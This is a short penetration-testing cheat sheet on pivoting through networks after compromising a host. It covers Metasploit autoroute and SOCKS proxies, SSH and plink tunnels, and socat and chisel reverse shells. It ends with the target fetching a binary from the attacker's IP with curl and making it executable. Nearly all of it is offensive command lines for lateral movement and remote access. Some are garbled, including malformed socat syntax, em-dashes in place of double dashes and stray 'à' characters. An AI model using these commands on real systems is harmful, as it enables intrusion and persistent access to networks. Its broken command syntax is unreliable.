Pivoting
1- Metasploit: -
After exploiting one machine and get the meterpreter for it run the following commands:-
1- Run autoroute -r target_ip_network
2- Run post/windows/arp_scanner target_ip_networkà to see the reachable active hosts.
3- Use /auxiliary/server/socks à to open proxy channel.
4- Then use proxychains in the attacking machine to run commends like nmap.
2- Without Metasploit: -
There are various tools for that:-
· SSH Tunneling and Port forward:-
1- Forward connection- run the following commands on the attacking machine:-
A- Ssh -L LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@SSH_SERVER -FN
2- Create a proxy using ssh — run the following commands on the attacking machine:-
A- Ssh -D #PORT USER@SSH_SERVER -FN
· Plink.exe (it’s for windows because doesn’t have ssh server):-
1- Sudo apt install putty_tools
2- Cmd /c .y| ./plink.exe -R LOCAL_PORT:DESTINATION_IP:DESTINATION_PORT USER@IP -i KEYFILE -N
3- Puttygen KEYFILE -O FILE.ppk
· Socat
1- Reverse shell:-
A- On attacking à nc -nlvp port
B- On targetà./socat tcp-l: LOCAL_PORT tcp-l:attacking_ip:port
2- Port forward:-
A- On attacking à ./socat tcp-l:port tcp-l:port fork, reuseaddr
B- On targetà./socat tcp:attacking_ip:port tcp:target_ip:port, fork
· Chisel (it’s for windows and linux):
1- Reverse shell:-
A- On attackingà ./chisel server -p PORT — -reverse
B- On targetà ./chisel client attacking_ip:port R:socks
2- Forward shell proxy:-
A- On attackingà ./chisel server -p PORT — -socks5
B- On target à ./chisel client target_ip:attacking_port proxy_port:socks
· Shuttle
1- Sshuttle -r USER@IP_SERVER SUBNET -x IP_SERVER
2- — -sh-cmd “ssh -i priv-key”
Use wget URL -q à to download a file
To transefer a file from attacking to target machine:
A1- scp -i KEY chisel user@target:/tmp/chisel-USERNAME
B1-On the attackingà sudo python3 -m http.server 80
B2- On the target à curl ATTACKING_IP/socat -o /tmp/socat-USERNAME && chmod +x /tmp/socat-USERNAME